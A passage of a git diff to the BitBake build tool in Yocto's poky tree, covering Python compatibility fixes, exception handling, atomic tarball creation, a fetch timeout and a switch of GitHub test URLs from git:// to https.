" -> ".join(chain))) chain.append(task) for othertask in tasks: if othertask == task: diff --git a/poky/bitbake/lib/bb/command.py b/poky/bitbake/lib/bb/command.py index 6abf38668b..98c945edb5 100644 --- a/poky/bitbake/lib/bb/command.py +++ b/poky/bitbake/lib/bb/command.py @@ -74,8 +74,12 @@ class Command: result = command_method(self, commandline) except CommandError as exc: return None, exc.args[0] - except (Exception, SystemExit): + except (Exception, SystemExit) as exc: import traceback + if isinstance(exc, bb.BBHandledException): + # We need to start returning real exceptions here. Until we do, we can't + # tell if an exception is an instance of bb.BBHandledException + return None, "bb.BBHandledException()\n" + traceback.format_exc() return None, traceback.format_exc() else: return result, None @@ -620,6 +624,16 @@ class CommandsAsync: command.finishAsyncCommand() findFilesMatchingInDir.needcache = False + def testCookerCommandEvent(self, command, params): + """ + Dummy command used by OEQA selftest to test tinfoil without IO + """ + pattern = params[0] + + command.cooker.testCookerCommandEvent(pattern) + command.finishAsyncCommand() + testCookerCommandEvent.needcache = False + def findConfigFilePath(self, command, params): """ Find the path of the requested configuration file diff --git a/poky/bitbake/lib/bb/compat.py b/poky/bitbake/lib/bb/compat.py deleted file mode 100644 index 49356681ab..0000000000 --- a/poky/bitbake/lib/bb/compat.py +++ /dev/null @@ -1,10 +0,0 @@ -# -# SPDX-License-Identifier: GPL-2.0-only -# - -"""Code pulled from future python versions, here for compatibility""" - -from collections import MutableMapping, KeysView, ValuesView, ItemsView, OrderedDict -from functools import total_ordering - - diff --git a/poky/bitbake/lib/bb/cooker.py b/poky/bitbake/lib/bb/cooker.py index 730cdc56ff..ac54d4378d 100644 --- a/poky/bitbake/lib/bb/cooker.py +++ b/poky/bitbake/lib/bb/cooker.py @@ -411,10 +411,7 @@ class BBCooker: self.data.disableTracking() def parseConfiguration(self): - # Set log file verbosity - verboselogs = bb.utils.to_boolean(self.data.getVar("BB_VERBOSE_LOGS", False)) - if verboselogs: - bb.msg.loggerVerboseLogs = True + self.updateCacheSync() # Change nice level if we're asked to nice = self.data.getVar("BB_NICE_LEVEL") @@ -1022,6 +1019,11 @@ class BBCooker: if matches: bb.event.fire(bb.event.FilesMatchingFound(filepattern, matches), self.data) + def testCookerCommandEvent(self, filepattern): + # Dummy command used by OEQA selftest to test tinfoil without IO + matches = ["A", "B"] + bb.event.fire(bb.event.FilesMatchingFound(filepattern, matches), self.data) + def findProviders(self, mc=''): return bb.providers.findProviders(self.databuilder.mcdata[mc], self.recipecaches[mc], self.recipecaches[mc].pkg_pn) diff --git a/poky/bitbake/lib/bb/cookerdata.py b/poky/bitbake/lib/bb/cookerdata.py index 472423fdc8..30727bf2ee 100644 --- a/poky/bitbake/lib/bb/cookerdata.py +++ b/poky/bitbake/lib/bb/cookerdata.py @@ -58,11 +58,14 @@ class ConfigParameters(object): def updateToServer(self, server, environment): options = {} for o in ["abort", "force", "invalidate_stamp", - "verbose", "debug", "dry_run", "dump_signatures", + "debug", "dry_run", "dump_signatures", "debug_domains", "extra_assume_provided", "profile", "prefile", "postfile", "server_timeout"]: options[o] = getattr(self.options, o) + options['build_verbose_shell'] = self.options.verbose + options['build_verbose_stdout'] = self.options.verbose + ret, error = server.runCommand(["updateConfig", options, environment, sys.argv]) if error: raise Exception("Unable to update the server configuration with local parameters: %s" % error) @@ -125,6 +128,8 @@ class CookerConfiguration(object): self.skipsetscene = False self.invalidate_stamp = False self.dump_signatures = [] + self.build_verbose_shell = False + self.build_verbose_stdout = False self.dry_run = False self.tracking = False self.xmlrpcinterface = [] @@ -297,6 +302,8 @@ class CookerDataBuilder(object): multiconfig = (self.data.getVar("BBMULTICONFIG") or "").split() for config in multiconfig: + if config[0].isdigit(): + bb.fatal("Multiconfig name '%s' is invalid as multiconfigs cannot start with a digit" % config) mcdata = self.parseConfigurationFiles(self.prefiles, self.postfiles, config) bb.event.fire(bb.event.ConfigParsed(), mcdata) self.mcdata[config] = mcdata @@ -348,6 +355,9 @@ class CookerDataBuilder(object): layers = (data.getVar('BBLAYERS') or "").split() broken_layers = [] + if not layers: + bb.fatal("The bblayers.conf file doesn't contain any BBLAYERS definition") + data = bb.data.createCopy(data) approved = bb.utils.approved_variables() @@ -399,6 +409,8 @@ class CookerDataBuilder(object): if c in collections_tmp: bb.fatal("Found duplicated BBFILE_COLLECTIONS '%s', check bblayers.conf or layer.conf to fix it." % c) compat = set((data.getVar("LAYERSERIES_COMPAT_%s" % c) or "").split()) + if compat and not layerseries: + bb.fatal("No core layer found to work with layer '%s'. Missing entry in bblayers.conf?" % c) if compat and not (compat & layerseries): bb.fatal("Layer %s is not compatible with the core layer which only supports these series: %s (layer is compatible with %s)" % (c, " ".join(layerseries), " ".join(compat))) diff --git a/poky/bitbake/lib/bb/data_smart.py b/poky/bitbake/lib/bb/data_smart.py index 61b37cf334..c46d3f0a08 100644 --- a/poky/bitbake/lib/bb/data_smart.py +++ b/poky/bitbake/lib/bb/data_smart.py @@ -17,7 +17,7 @@ BitBake build tools. # Based on functions from the base bb module, Copyright 2003 Holger Schurig import copy, re, sys, traceback -from collections import MutableMapping +from collections.abc import MutableMapping import logging import hashlib import bb, bb.codeparser @@ -403,7 +403,7 @@ class DataSmart(MutableMapping): s = __expand_python_regexp__.sub(varparse.python_sub, s) except SyntaxError as e: # Likely unmatched brackets, just don't expand the expression - if e.msg != "EOL while scanning string literal": + if e.msg != "EOL while scanning string literal" and not e.msg.startswith("unterminated string literal"): raise if s == olds: break @@ -411,6 +411,8 @@ class DataSmart(MutableMapping): raise except bb.parse.SkipRecipe: raise + except bb.BBHandledException: + raise except Exception as exc: tb = sys.exc_info()[2] raise ExpansionError(varname, s, exc).with_traceback(tb) from exc diff --git a/poky/bitbake/lib/bb/event.py b/poky/bitbake/lib/bb/event.py index d1359f0100..cb0b3b3345 100644 --- a/poky/bitbake/lib/bb/event.py +++ b/poky/bitbake/lib/bb/event.py @@ -10,17 +10,17 @@ BitBake build tools. # SPDX-License-Identifier: GPL-2.0-only # -import sys -import pickle -import logging -import atexit -import traceback import ast +import atexit +import collections +import logging +import pickle +import sys import threading +import traceback -import bb.utils -import bb.compat import bb.exceptions +import bb.utils # This is the pid for which we should generate the event. This is set when # the runqueue forks off. @@ -56,7 +56,7 @@ def set_class_handlers(h): _handlers = h def clean_class_handlers(): - return bb.compat.OrderedDict() + return collections.OrderedDict() # Internal _handlers = clean_class_handlers() diff --git a/poky/bitbake/lib/bb/fetch2/git.py b/poky/bitbake/lib/bb/fetch2/git.py index 112b833f87..f6f6b63a74 100644 --- a/poky/bitbake/lib/bb/fetch2/git.py +++ b/poky/bitbake/lib/bb/fetch2/git.py @@ -67,6 +67,7 @@ import subprocess import tempfile import bb import bb.progress +from contextlib import contextmanager from bb.fetch2 import FetchMethod from bb.fetch2 import runfetchcmd from bb.fetch2 import logger @@ -140,6 +141,10 @@ class Git(FetchMethod): ud.proto = 'file' else: ud.proto = "git" + if ud.host == "github.com" and ud.proto == "git": + # github stopped supporting git protocol + # https://github.blog/2021-09-01-improving-git-protocol-security-github/#no-more-unauthenticated-git + ud.proto = "https" if not ud.proto in ('git', 'file', 'ssh', 'http', 'https', 'rsync'): raise bb.fetch2.ParameterError("Invalid protocol type", ud.url) @@ -408,6 +413,20 @@ class Git(FetchMethod): bb.utils.remove(tmpdir, recurse=True) def build_mirror_data(self, ud, d): + + # Create as a temp file and move atomically into position to avoid races + @contextmanager + def create_atomic(filename): + fd, tfile = tempfile.mkstemp(dir=os.path.dirname(filename)) + try: + yield tfile + umask = os.umask(0o666) + os.umask(umask) + os.chmod(tfile, (0o666 & ~umask)) + os.rename(tfile, filename) + finally: + os.close(fd) + if ud.shallow and ud.write_shallow_tarballs: if not os.path.exists(ud.fullshallow): if os.path.islink(ud.fullshallow): @@ -418,7 +437,8 @@ class Git(FetchMethod): self.clone_shallow_local(ud, shallowclone, d) logger.info("Creating tarball of git repository") - runfetchcmd("tar -czf %s ." % ud.fullshallow, d, workdir=shallowclone) + with create_atomic(ud.fullshallow) as tfile: + runfetchcmd("tar -czf %s ." % tfile, d, workdir=shallowclone) runfetchcmd("touch %s.done" % ud.fullshallow, d) finally: bb.utils.remove(tempdir, recurse=True) @@ -427,7 +447,8 @@ class Git(FetchMethod): os.unlink(ud.fullmirror) logger.info("Creating tarball of git repository") - runfetchcmd("tar -czf %s ." % ud.fullmirror, d, workdir=ud.clonedir) + with create_atomic(ud.fullmirror) as tfile: + runfetchcmd("tar -czf %s ." % tfile, d, workdir=ud.clonedir) runfetchcmd("touch %s.done" % ud.fullmirror, d) def clone_shallow_local(self, ud, dest, d): diff --git a/poky/bitbake/lib/bb/fetch2/wget.py b/poky/bitbake/lib/bb/fetch2/wget.py index f7d1de26b7..5676d3fd27 100644 --- a/poky/bitbake/lib/bb/fetch2/wget.py +++ b/poky/bitbake/lib/bb/fetch2/wget.py @@ -319,7 +319,7 @@ class Wget(FetchMethod): except (TypeError, ImportError, IOError, netrc.NetrcParseError): pass - with opener.open(r) as response: + with opener.open(r, timeout=30) as response: pass except urllib.error.URLError as e: if try_again: diff --git a/poky/bitbake/lib/bb/msg.py b/poky/bitbake/lib/bb/msg.py index 2d88c4e72d..1b1a23bb50 100644 --- a/poky/bitbake/lib/bb/msg.py +++ b/poky/bitbake/lib/bb/msg.py @@ -146,18 +146,12 @@ class LogFilterLTLevel(logging.Filter): # loggerDefaultLogLevel = BBLogFormatter.NOTE -loggerDefaultVerbose = False -loggerVerboseLogs = False loggerDefaultDomains = {} def init_msgconfig(verbose, debug, debug_domains=None): """ Set default verbosity and debug levels config the logger """ - bb.msg.loggerDefaultVerbose = verbose - if verbose: - bb.msg.loggerVerboseLogs = True - if debug: bb.msg.loggerDefaultLogLevel = BBLogFormatter.DEBUG - debug + 1 elif verbose: diff --git a/poky/bitbake/lib/bb/persist_data.py b/poky/bitbake/lib/bb/persist_data.py index 7357ab2d44..56c983f816 100644 --- a/poky/bitbake/lib/bb/persist_data.py +++ b/poky/bitbake/lib/bb/persist_data.py @@ -12,14 +12,15 @@ currently, providing a key/value store accessed by 'domain'. # import collections +import collections.abc +import contextlib +import functools import logging import os.path +import sqlite3 import sys import warnings -from bb.compat import total_ordering -from collections import Mapping -import sqlite3 -import contextlib +from collections.abc import Mapping sqlversion = sqlite3.sqlite_version_info if sqlversion[0] < 3 or (sqlversion[0] == 3 and sqlversion[1] < 3): @@ -28,8 +29,8 @@ if sqlversion[0] < 3 or (sqlversion[0] == 3 and sqlversion[1] < 3): logger = logging.getLogger("BitBake.PersistData") -@total_ordering -class SQLTable(collections.MutableMapping): +@functools.total_ordering +class SQLTable(collections.abc.MutableMapping): class _Decorators(object): @staticmethod def retry(*, reconnect=True): diff --git a/poky/bitbake/lib/bb/process.py b/poky/bitbake/lib/bb/process.py index 2dc472a86f..24c588e533 100644 --- a/poky/bitbake/lib/bb/process.py +++ b/poky/bitbake/lib/bb/process.py @@ -179,5 +179,8 @@ def run(cmd, input=None, log=None, extrafiles=None, **options): stderr = stderr.decode("utf-8") if pipe.returncode != 0: + if log: + # Don't duplicate the output in the exception if logging it + raise ExecutionError(cmd, pipe.returncode, None, None) raise ExecutionError(cmd, pipe.returncode, stdout, stderr) return stdout, stderr diff --git a/poky/bitbake/lib/bb/runqueue.py b/poky/bitbake/lib/bb/runqueue.py index 2d35d478a4..a513b0983b 100644 --- a/poky/bitbake/lib/bb/runqueue.py +++ b/poky/bitbake/lib/bb/runqueue.py @@ -1256,8 +1256,8 @@ class RunQueue: "fakerootnoenv" : self.rqdata.dataCaches[mc].fakerootnoenv, "sigdata" : bb.parse.siggen.get_taskdata(), "logdefaultlevel" : bb.msg.loggerDefaultLogLevel, - "logdefaultverbose" : bb.msg.loggerDefaultVerbose, - "logdefaultverboselogs" : bb.msg.loggerVerboseLogs, + "build_verbose_shell" : self.cooker.configuration.build_verbose_shell, + "build_verbose_stdout" : self.cooker.configuration.build_verbose_stdout, "logdefaultdomain" : bb.msg.loggerDefaultDomains, "prhost" : self.cooker.prhost, "buildname" : self.cfgData.getVar("BUILDNAME"), diff --git a/poky/bitbake/lib/bb/server/process.py b/poky/bitbake/lib/bb/server/process.py index b66fbe0acd..7b13576274 100644 --- a/poky/bitbake/lib/bb/server/process.py +++ b/poky/bitbake/lib/bb/server/process.py @@ -152,7 +152,8 @@ class ProcessServer(multiprocessing.Process): conn = newconnections.pop(-1) fds.append(conn) self.controllersock = conn - elif self.timeout is None and not ready: + + elif not self.timeout and not ready: print("No timeout, exiting.") self.quit = True @@ -347,7 +348,12 @@ class ServerCommunicator(): logger.info("No reply from server in 30s") if not self.recv.poll(30): raise ProcessTimeout("Timeout while waiting for a reply from the bitbake server (60s)") - return self.recv.get() + ret, exc = self.recv.get() + # Should probably turn all exceptions in exc back into exceptions? + # For now, at least handle BBHandledException + if exc and "BBHandledException" in exc: + raise bb.BBHandledException() + return ret, exc def updateFeatureSet(self, featureset): _, error = self.runCommand(["setFeatures", featureset]) @@ -586,7 +592,7 @@ class BBUIEventQueue: self.reader = ConnectionReader(readfd) self.t = threading.Thread() - self.t.setDaemon(True) + self.t.daemon = True self.t.run = self.startCallbackHandler self.t.start() diff --git a/poky/bitbake/lib/bb/tests/event.py b/poky/bitbake/lib/bb/tests/event.py index 9229b63d47..9ca7e9bc8e 100644 --- a/poky/bitbake/lib/bb/tests/event.py +++ b/poky/bitbake/lib/bb/tests/event.py @@ -6,17 +6,18 @@ # SPDX-License-Identifier: GPL-2.0-only # -import unittest -import bb -import logging -import bb.compat -import bb.event +import collections import importlib +import logging +import pickle import threading import time -import pickle +import unittest from unittest.mock import Mock from unittest.mock import call + +import bb +import bb.event from bb.msg import BBLogFormatter @@ -75,7 +76,7 @@ class EventHandlingTest(unittest.TestCase): def _create_test_handlers(self): """ Method used to create a test handler ordered dictionary """ - test_handlers = bb.compat.OrderedDict() + test_handlers = collections.OrderedDict() test_handlers["handler1"] = self._test_process.handler1 test_handlers["handler2"] = self._test_process.handler2 return test_handlers @@ -96,7 +97,7 @@ class EventHandlingTest(unittest.TestCase): def test_clean_class_handlers(self): """ Test clean_class_handlers method """ - cleanDict = bb.compat.OrderedDict() + cleanDict = collections.OrderedDict() self.assertEqual(cleanDict, bb.event.clean_class_handlers()) diff --git a/poky/bitbake/lib/bb/tests/fetch.py b/poky/bitbake/lib/bb/tests/fetch.py index 6300f563f2..44dc0945a0 100644 --- a/poky/bitbake/lib/bb/tests/fetch.py +++ b/poky/bitbake/lib/bb/tests/fetch.py @@ -472,7 +472,7 @@ class GitDownloadDirectoryNamingTest(FetcherTest): super(GitDownloadDirectoryNamingTest, self).setUp() self.recipe_url = "git://git.openembedded.org/bitbake" self.recipe_dir = "git.openembedded.org.bitbake" - self.mirror_url = "git://github.com/openembedded/bitbake.git" + self.mirror_url = "git://github.com/openembedded/bitbake.git;protocol=https" self.mirror_dir = "github.com.openembedded.bitbake.git" self.d.setVar('SRCREV', '82ea737a0b42a8b53e11c9cde141e9e9c0bd8c40') @@ -520,7 +520,7 @@ class TarballNamingTest(FetcherTest): super(TarballNamingTest, self).setUp() self.recipe_url = "git://git.openembedded.org/bitbake" self.recipe_tarball = "git2_git.openembedded.org.bitbake.tar.gz" - self.mirror_url = "git://github.com/openembedded/bitbake.git" + self.mirror_url = "git://github.com/openembedded/bitbake.git;protocol=https" self.mirror_tarball = "git2_github.com.openembedded.bitbake.git.tar.gz" self.d.setVar('BB_GENERATE_MIRROR_TARBALLS', '1') @@ -554,7 +554,7 @@ class GitShallowTarballNamingTest(FetcherTest): super(GitShallowTarballNamingTest, self).setUp() self.recipe_url = "git://git.openembedded.org/bitbake" self.recipe_tarball = "gitshallow_git.openembedded.org.bitbake_82ea737-1_master.tar.gz" - self.mirror_url = "git://github.com/openembedded/bitbake.git" + self.mirror_url = "git://github.com/openembedded/bitbake.git;protocol=https" self.mirror_tarball = "gitshallow_github.com.openembedded.bitbake.git_82ea737-1_master.tar.gz" self.d.setVar('BB_GIT_SHALLOW', '1') @@ -921,7 +921,7 @@ class FetcherNetworkTest(FetcherTest): def test_git_submodule_dbus_broker(self): # The following external repositories have show failures in fetch and unpack operations # We want to avoid regressions! - url = "gitsm://github.com/bus1/dbus-broker;protocol=git;rev=fc874afa0992d0c75ec25acb43d344679f0ee7d2;branch=main" + url = "gitsm://github.com/bus1/dbus-broker;protocol=https;rev=fc874afa0992d0c75ec25acb43d344679f0ee7d2;branch=main" fetcher = bb.fetch.Fetch([url], self.d) fetcher.download() # Previous cwd has been deleted @@ -937,7 +937,7 @@ class FetcherNetworkTest(FetcherTest): @skipIfNoNetwork() def test_git_submodule_CLI11(self): - url = "gitsm://github.com/CLIUtils/CLI11;protocol=git;rev=bd4dc911847d0cde7a6b41dfa626a85aab213baf" + url = "gitsm://github.com/CLIUtils/CLI11;protocol=https;rev=bd4dc911847d0cde7a6b41dfa626a85aab213baf;branch=main" fetcher = bb.fetch.Fetch([url], self.d) fetcher.download() # Previous cwd has been deleted @@ -952,12 +952,12 @@ class FetcherNetworkTest(FetcherTest): @skipIfNoNetwork() def test_git_submodule_update_CLI11(self): """ Prevent regression on update detection not finding missing submodule, or modules without needed commits """ - url = "gitsm://github.com/CLIUtils/CLI11;protocol=git;rev=cf6a99fa69aaefe477cc52e3ef4a7d2d7fa40714" + url = "gitsm://github.com/CLIUtils/CLI11;protocol=https;rev=cf6a99fa69aaefe477cc52e3ef4a7d2d7fa40714;branch=main" fetcher = bb.fetch.Fetch([url], self.d) fetcher.download() # CLI11 that pulls in a newer nlohmann-json - url = "gitsm://github.com/CLIUtils/CLI11;protocol=git;rev=49ac989a9527ee9bb496de9ded7b4872c2e0e5ca" + url = "gitsm://github.com/CLIUtils/CLI11;protocol=https;rev=49ac989a9527ee9bb496de9ded7b4872c2e0e5ca;branch=main" fetcher = bb.fetch.Fetch([url], self.d) fetcher.download() # Previous cwd has been deleted @@ -971,7 +971,7 @@ class FetcherNetworkTest(FetcherTest): @skipIfNoNetwork() def test_git_submodule_aktualizr(self): - url = "gitsm://github.com/advancedtelematic/aktualizr;branch=master;protocol=git;rev=d00d1a04cc2366d1a5f143b84b9f507f8bd32c44" + url = "gitsm://github.com/advancedtelematic/aktualizr;branch=master;protocol=https;rev=d00d1a04cc2366d1a5f143b84b9f507f8bd32c44" fetcher = bb.fetch.Fetch([url], self.d) fetcher.download() # Previous cwd has been deleted @@ -991,7 +991,7 @@ class FetcherNetworkTest(FetcherTest): """ Prevent regression on deeply nested submodules not being checked out properly, even though they were fetched. """ # This repository also has submodules where the module (name), path and url do not align - url = "gitsm://github.com/azure/iotedge.git;protocol=git;rev=d76e0316c6f324345d77c48a83ce836d09392699" + url = "gitsm://github.com/azure/iotedge.git;protocol=https;rev=d76e0316c6f324345d77c48a83ce836d09392699" fetcher = bb.fetch.Fetch([url], self.d) fetcher.download() # Previous cwd has been deleted @@ -1049,7 +1049,7 @@ class SVNTest(FetcherTest): bb.process.run("svn co %s svnfetch_co" % self.repo_url, cwd=self.tempdir) # Github will emulate SVN. Use this to check if we're downloding... - bb.process.run("svn propset svn:externals 'bitbake svn://vcs.pcre.org/pcre2/code' .", + bb.process.run("svn propset svn:externals 'bitbake https://github.com/PhilipHazel/pcre2.git' .", cwd=os.path.join(self.tempdir, 'svnfetch_co', 'trunk')) bb.process.run("svn commit --non-interactive -m 'Add external'", cwd=os.path.join(self.tempdir, 'svnfetch_co', 'trunk')) @@ -1167,7 +1167,7 @@ class FetchLatestVersionTest(FetcherTest): test_git_uris = { # version pattern "X.Y.Z" - ("mx-1.0", "git://github.com/clutter-project/mx.git;branch=mx-1.4", "9b1db6b8060bd00b121a692f942404a24ae2960f", "") + ("mx-1.0", "git://github.com/clutter-project/mx.git;branch=mx-1.4;protocol=https", "9b1db6b8060bd00b121a692f942404a24ae2960f", "") : "1.99.4", # version pattern "vX.Y" # mirror of git.infradead.org since network issues interfered with testing @@ -1178,7 +1178,7 @@ class FetchLatestVersionTest(FetcherTest): ("presentproto", "git://git.yoctoproject.org/bbfetchtests-presentproto", "24f3a56e541b0a9e6c6ee76081f441221a120ef9", "") : "1.0", # version pattern "pkg_name-vX.Y.Z" - ("dtc", "git://git.qemu.org/dtc.git", "65cc4d2748a2c2e6f27f1cf39e07a5dbabd80ebf", "") + ("dtc", "git://git.yoctoproject.org/bbfetchtests-dtc.git", "65cc4d2748a2c2e6f27f1cf39e07a5dbabd80ebf", "") : "1.4.0", # combination version pattern ("sysprof", "git://gitlab.gnome.org/GNOME/sysprof.git;protocol=https", "cd44ee6644c3641507fb53b8a2a69137f2971219", "") @@ -1190,13 +1190,13 @@ class FetchLatestVersionTest(FetcherTest): : "20120614", # packages with a valid UPSTREAM_CHECK_GITTAGREGEX # mirror of git://anongit.freedesktop.org/xorg/driver/xf86-video-omap since network issues interfered with testing - ("xf86-video-omap", "git://git.yoctoproject.org/bbfetchtests-xf86-video-omap", "ae0394e687f1a77e966cf72f895da91840dffb8f", "(?P(\d+\.(\d\.?)*))") + ("xf86-video-omap", "git://git.yoctoproject.org/bbfetchtests-xf86-video-omap", "ae0394e687f1a77e966cf72f895da91840dffb8f", r"(?P(\d+\.(\d\.?)*))") : "0.4.3", - ("build-appliance-image", "git://git.yoctoproject.org/poky", "b37dd451a52622d5b570183a81583cc34c2ff555", "(?P(([0-9][\.|_]?)+[0-9]))") + ("build-appliance-image", "git://git.yoctoproject.org/poky", "b37dd451a52622d5b570183a81583cc34c2ff555", r"(?P(([0-9][\.|_]?)+[0-9]))") : "11.0.0", - ("chkconfig-alternatives-native", "git://github.com/kergoth/chkconfig;branch=sysroot", "cd437ecbd8986c894442f8fce1e0061e20f04dee", "chkconfig\-(?P((\d+[\.\-_]*)+))") + ("chkconfig-alternatives-native", "git://github.com/kergoth/chkconfig;branch=sysroot;protocol=https", "cd437ecbd8986c894442f8fce1e0061e20f04dee", r"chkconfig\-(?P((\d+[\.\-_]*)+))") : "1.3.59", - ("remake", "git://github.com/rocky/remake.git", "f05508e521987c8494c92d9c2871aec46307d51d", "(?P(\d+\.(\d+\.)*\d*(\+dbg\d+(\.\d+)*)*))") + ("remake", "git://github.com/rocky/remake.git;protocol=https", "f05508e521987c8494c92d9c2871aec46307d51d", r"(?P(\d+\.(\d+\.)*\d*(\+dbg\d+(\.\d+)*)*))") : "3.82+dbg0.9", } @@ -1236,11 +1236,11 @@ class FetchLatestVersionTest(FetcherTest): # # http://www.cups.org/software/1.7.2/cups-1.7.2-source.tar.bz2 # https://github.com/apple/cups/releases - ("cups", "/software/1.7.2/cups-1.7.2-source.tar.bz2", "/apple/cups/releases", "(?Pcups\-)(?P((\d+[\.\-_]*)+))\-source\.tar\.gz") + ("cups", "/software/1.7.2/cups-1.7.2-source.tar.bz2", "/apple/cups/releases", r"(?Pcups\-)(?P((\d+[\.\-_]*)+))\-source\.tar\.gz") : "2.0.0", # http://download.oracle.com/berkeley-db/db-5.3.21.tar.gz # http://ftp.debian.org/debian/pool/main/d/db5.3/ - ("db", "/berkeley-db/db-5.3.21.tar.gz", "/debian/pool/main/d/db5.3/", "(?Pdb5\.3_)(?P\d+(\.\d+)+).+\.orig\.tar\.xz") + ("db", "/berkeley-db/db-5.3.21.tar.gz", "/debian/pool/main/d/db5.3/", r"(?Pdb5\.3_)(?P\d+(\.\d+)+).+\.orig\.tar\.xz") : "5.3.10", } @@ -1290,9 +1290,6 @@ class FetchCheckStatusTest(FetcherTest): "http://downloads.yoctoproject.org/releases/opkg/opkg-0.1.7.tar.gz", "http://downloads.yoctoproject.org/releases/opkg/opkg-0.3.0.tar.gz", "ftp://sourceware.org/pub/libffi/libffi-1.20.tar.gz", - "http://ftp.gnu.org/gnu/autoconf/autoconf-2.60.tar.gz", - "https://ftp.gnu.org/gnu/chess/gnuchess-5.08.tar.gz", - "https://ftp.gnu.org/gnu/gmp/gmp-4.0.tar.gz", # GitHub releases are hosted on Amazon S3, which doesn't support HEAD "https://github.com/kergoth/tslib/releases/download/1.1/tslib-1.1.tar.xz" ] @@ -1983,7 +1980,7 @@ class GitShallowTest(FetcherTest): @skipIfNoNetwork() def test_bitbake(self): - self.git('remote add --mirror=fetch origin git://github.com/openembedded/bitbake', cwd=self.srcdir) + self.git('remote add --mirror=fetch origin https://github.com/openembedded/bitbake', cwd=self.srcdir) self.git('config core.bare true', cwd=self.srcdir) self.git('fetch', cwd=self.srcdir) diff --git a/poky/bitbake/lib/bb/tinfoil.py b/poky/bitbake/lib/bb/tinfoil.py index 8c9b6b8ca5..ae69038952 100644 --- a/poky/bitbake/lib/bb/tinfoil.py +++ b/poky/bitbake/lib/bb/tinfoil.py @@ -465,7 +465,16 @@ class Tinfoil: commandline = [command] if params: commandline.extend(params) - result = self.server_connection.connection.runCommand(commandline) + try: + result = self.server_connection.connection.runCommand(commandline) + finally: + while True: + event = self.wait_event() + if not event: + break + if isinstance(event, logging.LogRecord): + if event.taskpid == 0 or event.levelno > logging.INFO: + self.logger.handle(event) if result[1]: raise TinfoilCommandFailed(result[1]) return result[0] diff --git a/poky/bitbake/lib/bb/ui/knotty.py b/poky/bitbake/lib/bb/ui/knotty.py index 87e873d644..e70c246400 100644 --- a/poky/bitbake/lib/bb/ui/knotty.py +++ b/poky/bitbake/lib/bb/ui/knotty.py @@ -380,14 +380,27 @@ _evt_list = [ "bb.runqueue.runQueueExitWait", "bb.event.LogExecTTY", "logging.Lo "bb.event.BuildBase", "bb.build.TaskStarted", "bb.build.TaskSucceeded", "bb.build.TaskFailedSilent", "bb.build.TaskProgress", "bb.event.ProcessStarted", "bb.event.ProcessProgress", "bb.event.ProcessFinished"] +def drain_events_errorhandling(eventHandler): + # We don't have logging setup, we do need to show any events we see before exiting + event = True + logger = bb.msg.logger_create('bitbake', sys.stdout) + while event: + event = eventHandler.waitEvent(0) + if isinstance(event, logging.LogRecord): + logger.handle(event) + def main(server, eventHandler, params, tf = TerminalFilter): - if not params.observe_only: - params.updateToServer(server, os.environ.copy()) + try: + if not params.observe_only: + params.updateToServer(server, os.environ.copy()) - includelogs, loglines, consolelogfile, logconfigfile = _log_settings_from_server(server, params.observe_only) + includelogs, loglines, consolelogfile, logconfigfile = _log_settings_from_server(server, params.observe_only) - loglevel, _ = bb.msg.constructLogOptions() + loglevel, _ = bb.msg.constructLogOptions() + except bb.BBHandledException: + drain_events_errorhandling(eventHandler) + return 1 if params.options.quiet == 0: console_loglevel = loglevel diff --git a/poky/bitbake/lib/bb/ui/taskexp.py b/poky/bitbake/lib/bb/ui/taskexp.py index 2b246710ca..c00eaf6638 100644 --- a/poky/bitbake/lib/bb/ui/taskexp.py +++ b/poky/bitbake/lib/bb/ui/taskexp.py @@ -8,6 +8,7 @@ # import sys +import traceback try: import gi @@ -196,6 +197,7 @@ def main(server, eventHandler, params): gtkgui.start() try: + params.updateToServer(server, os.environ.copy()) params.updateFromServer(server) cmdline = params.parseActions() if not cmdline: @@ -218,6 +220,9 @@ def main(server, eventHandler, params): except client.Fault as x: print("XMLRPC Fault getting commandline:\n %s" % x) return + except Exception as e: + print("Exception in startup:\n %s" % traceback.format_exc()) + return if gtkthread.quit.isSet(): return diff --git a/poky/bitbake/lib/bb/utils.py b/poky/bitbake/lib/bb/utils.py index 5f5767c1da..fab16ffc58 100644 --- a/poky/bitbake/lib/bb/utils.py +++ b/poky/bitbake/lib/bb/utils.py @@ -16,7 +16,8 @@ import bb.msg import multiprocessing import fcntl import importlib -from importlib import machinery +import importlib.machinery +import importlib.util import itertools import subprocess import glob @@ -1584,7 +1585,9 @@ def load_plugins(logger, plugins, pluginpath): logger.debug(1, 'Loading plugin %s' % name) spec = importlib.machinery.PathFinder.find_spec(name, path=[pluginpath] ) if spec: - return spec.loader.load_module() + mod = importlib.util.module_from_spec(spec) + spec.loader.exec_module(mod) + return mod logger.debug(1, 'Loading plugins from %s...' % pluginpath) diff --git a/poky/bitbake/lib/bblayers/action.py b/poky/bitbake/lib/bblayers/action.py index d6459d6617..d2f9c1bbde 100644 --- a/poky/bitbake/lib/bblayers/action.py +++ b/poky/bitbake/lib/bblayers/action.py @@ -50,10 +50,10 @@ class ActionPlugin(LayerPlugin): if not (args.force or notadded): try: self.tinfoil.run_command('parseConfiguration') - except bb.tinfoil.TinfoilUIException: + except (bb.tinfoil.TinfoilUIException, bb.BBHandledException): # Restore the back up copy of bblayers.conf shutil.copy2(backup, bblayers_conf) - bb.fatal("Parse failure with the specified layer added") + bb.fatal("Parse failure with the specified layer added, aborting.") else: for item in notadded: sys.stderr.write("Specified layer %s is already in BBLAYERS\n" % item) diff --git a/poky/bitbake/lib/bblayers/query.py b/poky/bitbake/lib/bblayers/query.py index e2cc310532..652a3acce0 100644 --- a/poky/bitbake/lib/bblayers/query.py +++ b/poky/bitbake/lib/bblayers/query.py @@ -150,7 +150,7 @@ skipped recipes will also be listed, with a " (skipped)" suffix. def print_item(f, pn, ver, layer, ispref): if not selected_layer or layer == selected_layer: if not bare and f in skiplist: - skipped = ' (skipped)' + skipped = ' (skipped: %s)' % self.tinfoil.cooker.skiplist[f].skipreason else: skipped = '' if show_filenames: @@ -433,10 +433,10 @@ NOTE: .bbappend files can impact the dependencies. line = fnfile.readline() # The "require/include xxx" in conf/machine/*.conf, .inc and .bbclass - conf_re = re.compile(".*/conf/machine/[^\/]*\.conf$") - inc_re = re.compile(".*\.inc$") + conf_re = re.compile(r".*/conf/machine/[^\/]*\.conf$") + inc_re = re.compile(r".*\.inc$") # The "inherit xxx" in .bbclass - bbclass_re = re.compile(".*\.bbclass$") + bbclass_re = re.compile(r".*\.bbclass$") for layerdir in self.bblayers: layername = self.get_layer_name(layerdir) for dirpath, dirnames, filenames in os.walk(layerdir): diff --git a/poky/bitbake/lib/hashserv/server.py b/poky/bitbake/lib/hashserv/server.py index 81050715ea..f38a22ad92 100644 